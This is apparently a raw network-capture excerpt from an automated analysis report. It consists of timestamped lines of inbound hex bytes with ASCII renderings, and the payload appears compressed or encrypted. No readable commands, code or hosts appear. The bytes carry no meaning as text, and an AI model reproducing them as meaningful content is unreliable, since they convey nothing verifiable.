                                                                                                        2022-09-29 12:46:09 UTC8984INData Raw: d6 91 16 40 38 9a 03 50 65 14 d6 f4 31 a6 4f 62 26 3a 38 d4 6a 23 a8 b9 3f 34 c1 e5 aa 78 5c a6 2b 5e d3 1f 5f c6 e2 2a 02 35 de be 8e b6 2d bc 4b 18 21 9a b6 cc 94 e8 c9 8e 16 d7 f8 89 e3 5b 7a 98 34 6c 90 b5 af 54 91 64 d2 90 d9 c5 0d 09 e0 35 05 89 27 e9 c1 0a 5e ed 49 b6 6d 41 51 c2 ce e5 25 e9 3c 37 9e c7 3b 08 cd d5 4c c7 4c d1 eb c5 61 72 2a c4 d7 67 f1 1f 29 3f a8 7f 25 6b 6c 3e 42 f7 37 b1 49 90 88 a4 59 ca 48 10 60 08 fa 2b 61 43 dc 06 e7 e9 18 6d e3 04 1a 7c 2c ab 87 79 b6 62 98 82 b2 e8 85 ad 55 65 d9 67 05 a6 9a 59 53 70 4b 03 41 47 69 c3 39 97 c0 de 70 fd eb 76 ec 99 f0 c1 32 7a d8 33 f7 1d 42 76 2d 3c 34 e9 62 b3 24 db 98 ec f1 9d c7 1e be d0 96 d8 6b 31 59 6a e8 90 70 10 8a e9 33 50 9d f8 05 a9 99 bf 99 2d 97 c0 1e f9 3c 07 19 fb e9 c9 2d
                                                                                                        Data Ascii: @8Pe1Ob&:8j#?4x\+^_*5-K![z4lTd5'^ImAQ%<7;LLar*g)?%kl>B7IYH`+aCm|,ybUegYSpKAGi9pv2z3Bv-<4b$k1Yjp3P-<-
                                                                                                        2022-09-29 12:46:09 UTC8985INData Raw: 92 ed 66 93 ab 89 19 02 28 4e 67 0c 1d 58 a5 52 79 d8 ba 75 1b fd 3c 8d b8 70 ce a9 04 c9 fd 91 a4 05 21 bd c5 6c f1 67 56 c4 17 b5 6b 73 26 7e b8 26 13 00 d3 75 79 da cc e4 d4 a1 9e c7 6e 3e 6b 96 e8 19 f4 b1 3f 0b 94 24 60 98 c1 fd 93 22 b8 f4 00 29 c1 71 d7 4f 5d 78 ca c9 b5 53 9f 7d 56 fd a8 ca ff 1e 46 dc b5 48 22 80 f4 68 ef f1 32 b4 61 fd ca 0c 46 8b c5 a5 1b 17 42 df 18 2f 14 f2 6b 5c ac 68 3e 41 fc 46 7d a3 f1 a5 56 3d 7c e4 e5 e8 45 88 16 04 d6 ac d2 40 7e 2d 44 d7 4e 17 9a 67 62 2d a7 1a 98 64 17 82 85 4d 5d 18 41 46 a4 1c 12 44 b9 89 d4 41 19 b6 89 7e c4 40 22 b4 57 f0 79 0d c9 ff 22 d0 06 6e 67 a1 41 93 58 4a d7 83 d5 78 94 bc fe f6 d8 ee 11 63 f4 89 93 d8 53 99 b9 8a 5f c1 6c 93 bd 0b e2 25 3a 6a c8 a0 77 f4 1f b6 71 ff be cd fc 40 d7 12 9b
                                                                                                        Data Ascii: f(NgXRyu<p!lgVks&~&uyn>k?$`")qO]xS}VFH"h2aFB/k\h>AF}V=|E@~-DNgb-dM]AFDA~@"Wy"ngAXJxcS_l%:jwq@
                                                                                                        2022-09-29 12:46:09 UTC8987INData Raw: 6d 56 f9 64 2a e2 2c 0d 16 dc 2e 0d ac bd 2c 69 ca 32 8b 32 bd c2 0a 88 31 ec 3d 80 38 4d 33 d1 b8 6d 73 75 61 a2 40 db 4f a0 fe e9 63 e8 67 3a f2 9f bd ae 1b f0 8b 9c ee ef a6 4e 87 c0 2d 78 d6 5c 99 f8 8f b9 28 bd 49 f2 c2 61 e3 8c 26 79 42 49 d5 60 06 25 a1 9b a2 da c9 67 72 1f 1c f0 c9 b9 13 ba 89 2d 93 1d 5f 70 fd 89 c0 ca b1 94 0f 54 b4 92 df 3a a5 ab 7f 82 7e d8 cb 7e 14 40 a0 91 a6 3d 2c 40 d4 f3 e7 ed 7c d9 7e d7 cd 62 e6 9a 77 b6 eb b9 ac d9 4b 2e 33 42 1b ba ea c5 28 67 38 ce be a9 54 84 72 50 69 d8 b3 63 61 c4 b2 83 2c a1 5b ce 1b df e8 da 48 a7 79 a6 05 4f 9f c0 34 76 1b 13 5f 0d 21 4f db 32 94 bc de 8d a1 70 63 45 b4 ea 5b e1 26 84 df 37 a0 33 d3 5d 31 3b 80 29 1d 38 ba 29 3c cc 01 fe 29 9a ec b1 ab f3 50 3c 86 66 f7 34 1d 8e 34 74 43 e9 0d
                                                                                                        Data Ascii: mVd*,.,i221=8M3msua@Ocg:N-x\(Ia&yBI`%gr-_pT:~~@=,@|~bwK.3B(g8TrPica,[HyO4v_!O2pcE[&73]1;)8)<)P<f44tC
                                                                                                        2022-09-29 12:46:09 UTC8988INData Raw: 70 9a 0a 7a c1 27 30 25 23 a4 78 2a b6 90 60 7d b0 2c 06 71 5c a7 a3 84 6d db ec bd 0f 71 f1 7f 1c da 59 1e 42 a5 26 89 02 80 bc 29 de a2 33 5b bf 33 02 de 53 4f 5a 19 f3 94 01 a5 ed 70 c5 1b f8 1d 93 8b 0c b8 8f b0 55 c1 40 bd f0 9a cc 5c 57 ea 01 b4 2c 09 3c ba df 1a 8c a3 b7 30 cf 9b 2f 14 68 46 24 6e 26 91 5c d2 e1 4c ab e3 aa 6f a3 e8 fa a6 2f 72 bf 86 d7 6c 1f 16 10 af d4 ad f2 33 23 c8 87 93 75 a5 7c af af d0 31 0f 6b 04 4f 73 3f 9f 9d 05 0a e9 08 ba 36 cc c4 ac 08 39 4b 80 7a e3 aa 84 12 36 65 37 ef 74 75 de 8b cb 43 16 ef e1 79 e1 d8 2b a5 57 c4 c4 36 a3 f3 2c 52 ce c0 f1 a4 45 95 c5 61 8d de b1 67 1c 60 6c d0 4e 3c e0 e7 52 6f 6d 3f cc 07 ab fe 49 f1 94 d9 f2 50 02 e1 4a 84 1f f2 28 8d 27 03 2e 31 ad eb 44 2c 56 70 24 75 1d 32 6c ff a4 76 4e dd
                                                                                                        Data Ascii: pz'0%#x*`},q\mqYB&)3[3SOZpU@\W,<0/hF$n&\Lo/rl3#u|1kOs?69Kz6e7tuCy+W6,REag`lN<Rom?IPJ('.1D,Vp$u2lvN
                                                                                                        2022-09-29 12:46:09 UTC8989INData Raw: 57 10 83 0b 76 f9 4a 3f df 92 8b a1 fa 0e cb af 26 23 9a 9a 01 03 23 a5 c1 8c 89 ca e1 4e 51 e3 b0 92 60 dd cf 23 2b 3a 58 21 7b 53 b0 30 b9 69 56 c9 72 e6 91 32 4f 11 42 f6 18 79 15 5a b7 f4 90 62 bf 40 98 fe ff 32 d7 58 43 a5 16 b4 c5 d4 1e 45 d0 0d 55 e3 90 3a f1 4b be e8 5c 76 24 86 cb 5d 59 32 92 d7 55 ae a8 d2 ee 84 4e 00 1a 90 11 99 45 63 95 b7 2d 70 83 1e 0d af 70 fe 4b 79 70 5b a4 27 5f 81 59 69 55 11 cb c9 06 77 47 04 cd 31 8b 67 14 f5 4e dc 27 54 7a 91 12 17 ea a9 e9 da 8f c8 70 dd d3 b5 f1 a6 11 24 a7 37 0d 9d e8 9a df ea 0f d4 20 28 a9 c6 75 0a 3d 4f 9d 79 84 d0 fc 73 2a f8 a7 39 46 0e a4 26 65 8b e1 89 44 b3 5e 10 ad bc 12 7e ee f8 e2 ba 74 70 36 73 2c fe 98 4b 85 e0 67 4f 3b d4 e7 1d a2 02 22 16 0c d4 86 ce a1 f7 33 0a 6c 2c 64 0a 8e 72 4b
                                                                                                        Data Ascii: WvJ?&##NQ`#+:X!{S0iVr2OByZb@2XCEU:K\v$]Y2UNEc-ppKyp['_YiUwG1gN'Tzp$7 (u=Oys*9F&eD^~tp6s,KgO;"3l,drK
                                                                                                        2022-09-29 12:46:09 UTC8991INData Raw: a7 74 d9 e0 c2 6d c2 cb 5a d5 9a ce c9 65 94 1e 86 2e e5 f7 49 90 5a c5 65 1c fa 44 8b f3 03 b1 d9 33 07 ab 60 93 88 fe 11 4f 43 95 6b e1 61 8a 6c 65 52 61 54 dd 9f 11 b3 3c d7 dd 34 08 3b bd 2b 8b ef eb 5d de 88 a1 09 53 82 66 a8 22 24 46 e7 f4 df 0f 5a 5f 10 8f 8a d2 00 de 88 02 2f 6f f8 a7 a0 2a 9b 0d 1a 28 cb 66 b6 4b 4e 23 e8 0d b3 f8 83 24 87 c8 26 20 42 3e 75 9c d4 1f 44 32 b6 15 c2 45 40 c7 fa 89 c0 80 19 bc f2 c2 f1 e0 6f 9d 3f 1a df 6a 1d 7f f5 cb 03 24 a1 21 57 1f 89 ae bf 65 fa 95 16 0c 8f b6 63 3a a0 11 70 1b 61 7d 40 4e a1 dc fb 19 19 8a 88 c1 b5 dc 26 c6 2a ad 7b 5c ee 9f e0 12 f4 12 db 17 e1 a7 cd 11 a1 7b 10 84 87 35 ad 9f 56 d0 53 42 40 00 05 3b ff 62 6c 21 2e 7e a7 d3 8c 67 69 f3 47 5d 1a c2 23 d9 99 10 83 7f 6a 3d a5 cd 4a 89 ed cb 2d
                                                                                                        Data Ascii: tmZe.IZeD3`OCkaleRaT<4;+]Sf"$FZ_/o*(fKN#$& B>uD2E@o?j$!Wec:pa}@N&*{\{5VSB@;bl!.~giG]#j=J-
                                                                                                        2022-09-29 12:46:09 UTC8992INData Raw: 0c 78 d4 31 d8 3a 93 a4 26 af f4 0e 1b f7 ec d2 c1 0a 47 63 f5 4d 2f f4 75 d6 a3 a7 f0 7c 62 e9 10 1c a2 fe f9 2f 1c fb 70 0f 60 36 9d 90 80 4d 16 9d 60 14 f2 b8 e9 22 a3 9d 1d 09 64 37 65 6e 69 47 ab 2c 18 9d 1e c6 e3 f6 dd 6c 8b df 83 24 cd 51 10 9d 9b a1 9e 4e f2 dd ab b4 a3 21 58 40 32 8f c9 45 c4 09 ea 0c 9f ee 6a 40 78 e8 81 ed f7 f5 c4 e6 fe 35 15 f1 10 ec 30 58 ef 43 12 ca 28 b8 15 f7 16 8f c1 23 e5 ae f5 27 87 b9 ca 9b 84 ef cf 44 6d 85 55 05 bb 22 88 92 22 d2 3e b6 1f 84 ec 66 5a b7 18 23 c1 c4 24 e7 1c b3 56 89 1b 2d 94 ee c9 df 7e c1 fd de 91 a8 de c1 d0 ac ae a6 93 9e 89 ce e4 28 6a 53 7c 4c 2c 2c a4 e5 91 e4 29 9d 3c e1 56 7a 35 be 18 ec 15 fa 87 2a 2e e0 d4 31 68 47 c8 72 3b d0 55 a1 69 0d cb 16 4e ce d6 07 61 0a dc 9a 2f aa 2b 3e 67 8e 6a
                                                                                                        Data Ascii: x1:&GcM/u|b/p`6M`"d7eniG,l$QN!X@2Ej@x50XC(#'DmU"">fZ#$V-~(jS|L,,)<Vz5*.1hGr;UiNa/+>gj
                                                                                                        2022-09-29 12:46:09 UTC8993INData Raw: 42 17 b4 01 79 98 99 81 50 b3 a0 cf bb ff 8f ef 78 eb 24 9d 5b cf 92 82 0d 41 f8 e9 89 26 05 21 3e a9 de 1c 26 dc 61 0d a1 d6 43 31 aa 74 00 c8 38 da 3f d8 ea a0 38 97 d2 c0 82 36 3e d3 90 48 15 5f 22 1d 16 6a 4e a2 d5 bc 92 30 4d 8e 41 0f 56 2d 62 f5 b5 47 76 69 4a 14 ba 4a 7f c0 bf fe 11 77 38 e6 8d 40 d8 36 a9 51 7c 50 24 69 95 a5 d3 6f 99 66 2c 22 af 3e 5c 7c b2 77 05 ef 08 b1 34 aa 5e 50 2c 6a c7 39 52 a1 b0 6e 3e 86 89 7b 26 de 4b 20 34 1c f9 27 4d e9 b1 60 cb 7d c3 aa b3 93 e3 5c aa 91 4a be 82 df 87 96 bc 21 28 c9 40 4a 4c 40 11 fd ad 7e 8f 96 df a5 c3 c7 be 3f 0d 84 61 ea 55 f5 54 f8 a2 f9 14 80 f8 e2 e4 b6 6f 42 36 45 7d 82 35 76 84 b2 02 88 a1 94 70 af 75 43 cc 8d e8 29 86 ee 4b c7 2c 61 5b d2 f9 22 87 23 9d 83 37 e9 91 aa ed bf 18 55 61 07 31
                                                                                                        Data Ascii: ByPx$[A&!>&aC1t8?86>H_"jN0MAV-bGviJJw8@6Q|P$iof,">\|w4^P,j9Rn>{&K 4'M`}\J!(@JL@~?aUToB6E}5vpuC)K,a["#7Ua1
                                                                                                        2022-09-29 12:46:09 UTC8995INData Raw: 89 81 53 62 0c 4d 39 a7 fd c9 ee 61 7d b9 52 68 8d ec 28 54 3f 55 03 0e c7 b1 21 75 4f a4 0f 36 04 99 61 af 70 42 6e fd c3 0c 97 02 21 04 4a bf 0c 9e aa 3c cb 22 16 14 c6 8d ed e5 1d d2 4e 2c 18 23 d6 24 13 4c 1f a9 d9 22 6b 19 24 5a 16 df a2 b4 04 cf b1 f2 12 d1 66 fa b9 be c1 81 36 58 44 98 62 ec 72 83 6a cd bd f3 c1 b1 9d 21 36 97 1e c8 4d 4e e2 7c 81 a9 d4 27 63 03 d4 33 01 2f ab 29 d2 75 cc 32 03 c0 07 21 bf 62 ff b7 16 0b 8b c4 47 cc f4 84 9a 04 1e 50 35 2f a2 7d 36 9e 80 ac e9 e2 ab f4 ca 2e c8 69 e0 ce ad 23 2e 5f d6 44 ae bb 09 24 80 73 06 49 86 bd f1 08 30 60 21 4e 6e 0c b1 03 b7 58 a6 2c 06 8c e7 f6 68 ef 54 dd f7 35 61 55 9f cd 55 ad 27 36 08 02 c5 77 88 23 6f 33 f1 00 ec 48 5c 2b 97 5e ff 99 ea be d3 08 e9 ef 94 23 22 5f cc 72 81 4f 74 03 1f
                                                                                                        Data Ascii: SbM9a}Rh(T?U!uO6apBn!J<"N,#$L"k$Zf6XDbrj!6MN|'c3/)u2!bGP5/}6.i#._D$sI0`!NnX,hT5aUU'6w#o3H\+^#"_rOt
                                                                                                        2022-09-29 12:46:09 UTC8996INData Raw: 14 b0 db 98 6d e2 9c 79 a5 c4 8d ee 34 83 7e 34 f5 d2 d4 3a ff b7 09 ae 87 61 16 0b a4 50 84 a0 81 3e f5 a6 03 cf 3e cc f4 f3 74 cf 04 fe 4f 9c 45 5a 86 52 a6 cf 29 9c 01 84 a2 03 f0 ff 50 3c d4 a9 0b b9 a3 80 05 2b 95 4b a8 2a 5b 81 81 3b 32 50 1a 8d 21 6d 4c ab c6 12 ca ee f8 88 dd 5d 43 74 2b 76 a7 50 9e 5d ce ec 2d 07 2b 90 93 7a 9e c0 c9 bf dc 0f c0 07 41 4f 0e dc 35 8a 40 9a 02 37 a7 63 d3 55 d9 0c e9 4b a2 78 80 99 0e 07 10 1f c6 34 bb 7e a0 86 ef 47 c8 36 10 e7 b4 a0 77 62 bc ad 6e 45 db e2 1e 39 7e 30 87 8d 8a 08 f4 7d 13 37 a0 c2 6d 22 8c 4a 76 a4 75 fb 67 c4 c5 da e2 d0 59 b6 da ba 72 c5 02 95 e4 67 32 39 fa 61 54 6b bf da 12 c5 27 be 38 5b 7f 4f 32 a1 1e f8 bf 6d c9 63 86 f5 10 88 f0 02 bc ed 70 7d 3d 87 fa 52 60 4e a6 21 0b 5b e9 e0 45 1c 40
                                                                                                        Data Ascii: my4~4:aP>>tOEZR)P<+K*[;2P!mL]Ct+vP]-+zAO5@7cUKx4~G6wbnE9~0}7m"JvugYrg29aTk'8[O2mcp}=R`N![E@
                                                                                                        2022-09-29 12:46:09 UTC8997INData Raw: 5a 42 29 bf 84 e7 c5 79 c8 c7 d5 d7 57 14 41 ca 20 f1 9f dd bd ee 15 d9 12 17 18 fc 54 14 16 78 e8 76 7f 3b 10 84 9b b6 d0 e6 cc 48 bf 70 d9 3a 2f ab 76 d2 ca 08 7e b5 ef f8 e8 77 41 a3 79 f7 82 e9 14 02 9f 1c e7 ad dc 83 d8 a9 a1 27 0b 88 92 da 84 d3 4a 89 aa 42 89 34 ff e8 0e 69 c9 c5 fb c8 48 a3 1f b7 b6 c3 55 7d d8 aa 3c d8 d5 2a 02 19 ca 6f 2a ab db 99 76 65 ee b0 e7 46 ef 29 9c 28 a3 8c 1c ed a4 ad 4b f7 40 07 95 5c 26 61 bd 74 ed 13 a7 3c 49 86 f8 c7 09 2e 6e bf 57 1f 34 4d 7c 2f 24 ed 86 fa da bb 47 09 7d 0d a6 e5 2c 96 74 8d b9 6e 27 45 18 73 f7 00 55 8d bb a8 ba 53 36 b8 94 81 d9 d5 23 16 dc cb 48 a5 4c f5 a7 4a 26 60 28 c2 9e 05 3b 15 38 ba 96 91 77 cb f1 29 26 3c 1f eb 3c f9 6d 75 6b 87 71 20 19 74 ee a9 67 31 71 da a6 42 50 31 5a be 31 2a 5b
                                                                                                        Data Ascii: ZB)yWA Txv;Hp:/v~wAy'JB4iHU}<*o*veF)(K@\&at<I.nW4M|/$G},tn'EsUS6#HLJ&`(;8w)&<<mukq tg1qBP1Z1*[
                                                                                                        2022-09-29 12:46:09 UTC8998INData Raw: 8d ed 36 ad 37 70 da 8a f7 82 c1 01 6c 3e 98 85 2a 19 ba 58 4c 08 07 9f 45 07 bc b2 65 77 57 1a ac ef 29 58 32 75 b9 c5 64 d8 5f 90 c0 8e 05 2b 06 b3 3b e2 4f 27 2e 9c ee 30 33 1b fa 09 6c e6 3c 0b 58 d3 b4 9a 92 5a cf 39 b7 3c 40 42 e1 92 8c 49 41 2e 17 ba c9 9f 9c 24 c9 9b a1 a6 e9 e3 78 60 14 41 51 bb 72 e6 d3 00 65 07 19 c4 b8 ba a7 64 4e 4c c0 54 e1 8e b9 5d 69 db 82 29 85 2c 0c 13 67 40 30 7d 38 14 e7 cd cb 7a 82 84 14 e1 ae 4a 92 5c ce 60 05 cb 06 ec 9f 5d 8a cd 30 53 4b 36 77 0f c7 b7 73 5a ef 5a cb bb bb b2 40 0b 8b 71 84 7d 36 f6 c4 78 f3 cc 14 83 d8 95 21 63 79 81 20 8e de 7f 30 6f cc 08 e9 80 55 45 d9 0f 2d 61 d7 ed fb b4 92 85 7e e9 21 28 4f 3b 16 54 b1 f6 29 24 17 7f 19 dd 8f 28 86 ec 0e ba 9f c8 56 ae 56 a5 96 2e ee 12 f8 c5 47 d4 07 1d 02
                                                                                                        Data Ascii: 67pl>*XLEewW)X2ud_+;O'.03l<XZ9<@BIA.$x`AQredNLT]i),g@0}8zJ\`]0SK6wsZZ@q}6x!cy 0oUE-a~!(O;T)$(VV.G
                                                                                                        2022-09-29 12:46:09 UTC9014INData Raw: 9a 24 38 1d 78 76 bc 68 54 b8 04 6a 1d 3b 46 21 ab c5 84 6c 3f 35 20 02 3d 9f c7 f2 ab bf 06 23 80 48 e6 b9 70 29 9d bb 90 d4 f3 8b 59 ac 5d 19 47 69 0f 6e fd 6a 72 9c bb 25 97 0c 64 f7 89 e8 bf 10 33 ae c2 af d7 11 66 e7 97 4a 02 e3 da f1 f0 14 92 7e 47 8e 4a f6 6e 9b d2 0a 13 66 72 85 39 05 3e b5 3e 67 91 63 0c 8b 87 1a 73 b4 47 17 63 5e b7 5f 38 32 6e 1e da 4c 97 d3 ab bc 1a b1 1f 25 58 d5 05 72 27 c3 49 73 96 89 83 5b 1a 79 fe a7 e6 05 d6 69 10 22 48 23 2c b0 4c cf 48 0d 43 46 d5 c0 66 da 60 fd e7 32 39 f5 24 e4 8f e3 9e 98 c7 9f 59 17 79 8c b2 df e9 3c 56 46 2f e7 84 f6 ac ef c6 b2 0d 74 6b 6a 55 7b 3f e7 7a fb 51 f5 2c e3 53 35 82 5c 0b 61 6a 99 16 76 00 8a 52 ca a5 c3 95 2f de f7 22 93 83 94 17 93 3b 2c 1a ce e5 c9 17 e3 77 ad 81 2e d8 d6 77 a3 b2
                                                                                                        Data Ascii: $8xvhTj;F!l?5 =#Hp)Y]Ginjr%d3fJ~GJnfr9>>gcsGc^_82nL%Xr'Is[yi"H#,LHCFf`29$Yy<VF/tkjU{?zQ,S5\ajvR/";,w.w
                                                                                                        2022-09-29 12:46:09 UTC9030INData Raw: 41 91 7e 4f d7 f0 4c c4 23 2d 0a 77 0e 82 f2 72 58 e7 19 c1 ef 3f de 10 b7 d3 3f 1c a4 1a c5 51 03 19 e8 4c 2f a2 29 1f 0e 8c 56 5e 92 5f 0f f7 6b cd 1d ad f1 8a 82 f2 66 2c 08 ca 70 ca 84 e4 16 fe 4d d2 41 d1 06 f8 ae bd 96 5d ec 99 55 86 aa b3 b5 41 6f 15 43 c9 cd 40 76 fe 84 e9 92 07 eb f6 25 ee 3e 26 5e 5c b9 d1 ad 01 e9 20 aa 80 e3 02 1a c8 bc 96 8b d1 9a c0 93 8d 3e c6 fe 3f c0 57 27 2b 34 27 56 06 12 fd 83 d8 88 41 d9 b3 88 5d 92 dd 07 0a be b1 58 43 d4 11 4b 11 69 f7 c5 70 c7 cc 52 d2 95 c3 d0 59 5d 99 7e d0 03 2a 5a 11 d6 c9 cb be 73 d0 cb 4a a8 30 51 c5 46 18 ef fe 3d de e0 6b fd 72 5d ef a9 fc 5c b6 6d 45 65 a7 67 40 fd 7d b9 d9 be fb 6d b5 df 6b 2b 49 f8 99 2e a4 f5 f3 34 ab a6 2d 83 43 95 72 4c 7f 3e 45 fd 8a 82 2b b5 86 3e 82 78 95 69 91 c9
                                                                                                        Data Ascii: A~OL#-wrX??QL/)V^_kf,pMA]UAoC@v%>&^\ >?W'+4'VA]XCKipRY]~*ZsJ0QF=kr]\mEeg@}mk+I.4-CrL>E+>xi
                                                                                                        2022-09-29 12:46:09 UTC9046INData Raw: 97 de 34 a3 82 a5 9c 0d b7 b8 d5 5f a7 50 94 07 98 cc 6f c9 6b e6 92 49 3c ec 48 63 f2 d1 de df bc 19 9e 88 8f 8e 73 e8 bd b2 25 83 52 95 58 e3 e9 45 fa a4 f7 26 53 94 7f 3d 03 65 6d e0 bb cb 94 de 40 a9 16 b0 92 e9 86 60 51 d5 92 df f4 40 3b 3c 86 cb 07 52 a9 19 d8 39 8e 67 8e 28 67 00 47 03 93 65 b8 aa b6 97 54 da ff 75 44 6f 7a 02 43 11 5f 42 95 2a c2 1f 44 ad b7 37 53 d9 2f 10 e4 29 d6 cd 80 8c 33 51 22 01 8c 3c f9 42 e0 b5 68 ea f7 62 19 80 34 2b aa a9 ed 64 f7 eb d5 5a 9b 0c 0e 60 0b 90 7f d5 75 f5 d8 05 eb 26 fc 4a 37 3c 93 c1 c4 74 56 b6 09 36 b0 7a 18 ee b2 79 f6 0a 79 cd d6 28 97 54 66 29 29 2d cc 3c f2 01 93 fd 01 67 4a 7c ff 82 6d ee b2 01 49 42 99 78 92 33 b6 63 bd 69 c5 78 64 01 87 9f 10 f1 8d dd 41 0c fb fc a3 af 55 ab db 4e 55 25 aa 1c 53
                                                                                                        Data Ascii: 4_PokI<Hcs%RXE&S=em@`Q@;<R9g(gGeTuDozC_B*D7S/)3Q"<Bhb4+dZ`u&J7<tV6zyy(Tf))-<gJ|mIBx3cixdAUNU%S
                                                                                                        2022-09-29 12:46:09 UTC9062INData Raw: 64 41 d4 d7 e3 98 b0 5d 9d 2b 31 6b 43 f0 b5 a8 f1 4d 5a 26 41 28 b4 dd d3 f9 c0 bb f6 d1 5a 82 69 e3 1d e8 be a2 a5 42 b8 2c 64 77 2c 22 b4 8d 7a 78 db 2a b7 f0 4c 0d 11 6e 3c fc a2 f3 68 5f 53 67 e6 3c 10 5b cc 14 3b a5 9f d0 5c 67 d4 e9 c1 d9 47 69 5a 8c f3 0f a3 f1 1d 01 a2 ed 01 97 07 26 d5 0d 6f ee dd 8b a0 79 0f 91 ca 58 a1 1b 96 3d 8d b6 6c 28 95 de 63 a0 2b 10 05 a4 39 a2 e7 8a 58 6a 31 0c 3d 6f 10 cc 54 3f e3 d0 e9 b7 b3 dc 02 09 89 f2 94 24 62 f2 16 43 42 a3 3a e1 43 a5 ea 33 6c ae 9f 60 f2 1e 61 5d bd fc ae 22 20 16 ed 75 d0 3a af da 0f 0a ea 82 6d d9 e6 c7 f7 f9 49 ff 77 0d 1d 3e b9 37 cf 73 51 f3 77 1e 4b 8e da f3 d5 98 92 f4 54 58 71 e2 dd fd 69 93 3a ca 3c 52 aa 83 3c fa 60 1c 02 77 bd 89 36 de e9 e8 2b 51 75 01 a6 33 30 6d e5 94 bf 9c 61
                                                                                                        Data Ascii: dA]+1kCMZ&A(ZiB,dw,"zx*Ln<h_Sg<[;\gGiZ&oyX=l(c+9Xj1=oT?$bCB:C3l`a]" u:mIw>7sQwKTXqi:<R<`w6+Qu30ma
                                                                                                        2022-09-29 12:46:09 UTC9078INData Raw: 36 40 42 ca be 46 f7 92 01 50 10 1b a2 b9 0e 9c 67 31 03 2f 92 df b6 c0 23 b0 ff 0d 10 11 f2 47 8b bc 03 c5 20 b4 1e 2e 58 75 01 a3 23 3e a3 69 27 75 35 c3 06 cc e1 e0 33 70 bc a8 3c f5 9c c2 00 31 bf 08 21 21 2b 2a 5a 10 8f 7b b8 89 92 a4 81 aa 75 6d c3 35 28 d1 e2 4e 2a 5d f9 c8 23 47 e1 72 68 59 f1 d0 f5 e3 91 24 04 0a 03 37 7a b3 3b ac ec 1a 8b 12 5a ae 80 62 7e 34 b6 35 fd 75 10 17 f7 9c 4c 6c 87 26 62 81 5f 60 21 e9 ed 71 5f 0f 59 c8 93 33 9f 6b 8c 3b b9 b7 e7 b1 57 35 82 6f 36 27 1d 27 82 ea 89 20 80 b3 12 3a eb 6e b9 c5 b9 46 bc 40 9e bd b6 b7 67 14 34 e8 72 d0 e1 95 e0 91 39 b2 23 d5 93 00 24 5c e4 83 49 a6 c9 8e e6 58 3b be 9b 12 6d 9d 5c db 49 45 46 b7 16 46 e2 f0 bd df f1 c3 52 68 43 7f f3 a3 0f a1 9a 61 e6 08 a7 29 98 2a 58 03 3d 84 16 ab d6
                                                                                                        Data Ascii: 6@BFPg1/#G .Xu#>i'u53p<1!!+*Z{um5(N*]#GrhY$7z;Zb~45uLl&b_`!q_Y3k;W5o6'' :nF@g4r9#$\IX;m\IEFFRhCa)*X=
                                                                                                        2022-09-29 12:46:09 UTC9094INData Raw: a8 4b 54 92 a5 e4 9a f9 c8 52 89 82 57 4c 46 12 2a 49 c4 f2 66 29 84 e5 0b 1b b8 c2 85 ea 0d e7 38 07 07 4b eb 0d e0 79 9e af 55 31 59 d4 64 0d fc 29 94 1f 3a 87 54 22 af 51 69 d5 7b b1 07 14 cc b2 6c ab 44 db ec 59 92 fb fb f7 78 e2 17 72 39 b1 6b 0a 4d 50 ab 7d 9a 22 88 8e 93 0c 98 63 20 37 0e 0d ca 45 48 b3 4d 75 a5 82 3e 30 da f4 c9 a6 b6 93 67 95 36 65 e3 d6 54 14 d4 83 29 f5 d4 75 34 2c a0 c2 ba 11 ea 15 0d ee d4 e2 2c 50 c3 4f e6 90 d0 57 57 4f d7 d8 8d d7 02 20 0b 47 a4 32 03 68 ea a5 a3 e0 8b df 94 b8 b6 73 70 76 a1 de cf 2e 42 81 45 10 cb ca 39 68 58 0e 53 32 8c 99 d8 14 9c f2 cd 02 92 b6 9c fb 1f fe f1 0c 79 ab ff 07 ef 28 c2 a2 78 e4 0d 14 b4 ab b1 cb 99 9b 89 35 41 25 cd da 63 d6 d1 02 fc 5f df 86 be 19 dd 93 e4 b5 51 ae e8 71 b9 0b 23 52 9e
                                                                                                        Data Ascii: KTRWLF*If)8KyU1Yd):T"Qi{lDYxr9kMP}"c 7EHMu>0g6eT)u4,,POWWO G2hspv.BE9hXS2y(x5A%c_Qq#R
                                                                                                        2022-09-29 12:46:09 UTC9110INData Raw: d5 1f 57 5f 7e c3 6b ae 52 55 91 65 5b f7 4e 69 15 a3 99 7c c4 18 f0 ac d3 9d 5c 3f 4e e9 ce 5b 66 f6 26 3f c4 74 b0 ad 07 c1 f6 fb b5 37 fd 9d 5b fa e5 bf bf a3 7f c6 05 23 03 06 3a a8 20 26 a6 e0 6c 5f cb 41 9e 07 16 f5 8a 4f 87 b4 e7 37 18 b9 61 fb 99 c7 98 9c 08 db 17 99 39 14 ed 4c 5c d0 69 d9 8b 61 d5 7f 4e 9f 27 92 b9 12 78 5b bf c2 a9 45 b2 0b 67 7b c2 bb b0 8e 41 f3 92 0e 9a 0f eb d9 74 9e d5 c9 04 50 db c1 11 2f 99 3b f1 27 e5 92 e1 da 1e 4a f6 e2 74 91 5f 85 e3 9e 49 2f ec c1 df be 42 83 6c 84 56 73 5c c7 71 eb 56 c8 f2 90 9b 11 6d 0c 9f 9a 31 f4 66 8b 14 f4 c4 fe 15 5d 8a 0d c2 f9 c3 93 d3 d1 d1 a9 dc d1 3a c3 67 f3 89 d1 5c 2d 49 be ba 2d 92 ca 5a 59 a2 c3 d1 dd c9 ce 63 4f 56 d9 c3 72 f4 81 97 5b 33 57 db c4 50 56 7b 7d 59 d3 69 62 e1 74 61
                                                                                                        Data Ascii: W_~kRUe[Ni|\?N[f&?t7[#: &l_AO7a9L\iaN'x[Eg{AtP/;'Jt_I/BlVs\qVm1f]:g\-I-ZYcOVr[3WPV{}Yibta
                                                                                                        2022-09-29 12:46:09 UTC9126INData Raw: 98 f9 77 55 b4 02 ca c1 b8 5f db 78 f2 08 49 1e b2 cc e8 e2 5c 47 75 a1 98 7c 0f 23 c9 60 cb 9e 6c ba 13 16 19 ff 35 0f 10 f5 c9 c7 6c 1c 5a 3c bc 7e ea f7 3f d9 d5 69 30 a4 36 86 cb 8d 22 d4 cb fc 64 83 b2 73 38 b2 67 b2 e5 9a 08 6b da 19 95 0e 38 94 b7 06 cb 24 79 c0 c3 c1 20 ad 38 03 19 1b c3 28 e6 03 f0 07 85 01 ba 17 37 36 4c c3 ca 86 95 18 d9 73 c9 4c f4 b9 04 07 25 37 c8 8d 01 74 44 65 e2 4a 58 1d f9 c3 bc d8 3a 8b fb 75 95 45 bb 62 ed 7b 56 2c a3 a4 1b 20 58 7e 03 71 a2 6d 4e b4 a2 9b e3 01 06 bd 44 6d 95 c9 57 ad 2a 4d 92 3b 60 2c 2a cc 47 fc 10 be 65 8a de 94 66 c7 9f 